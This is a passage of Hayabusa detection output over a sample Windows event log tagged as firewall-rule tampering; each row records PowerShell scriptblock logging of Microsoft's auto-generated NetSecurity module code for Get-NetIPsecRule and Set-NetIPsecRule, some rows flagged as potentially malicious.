Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.774 +00:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"Name='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) 
$__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') 
-contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) 
$__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 
'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if 
($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName ))",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.774 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"Name='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') 
-contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', 
$__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if 
($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and 
(@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName ))",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.774 +00:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"{ $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecRule' -Alias '*' function Set-NetIPsecRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, 
ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${Platform}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode] ${Mode}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('SecIn')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${InboundSecurity}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('SecOut')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${OutboundSecurity}, 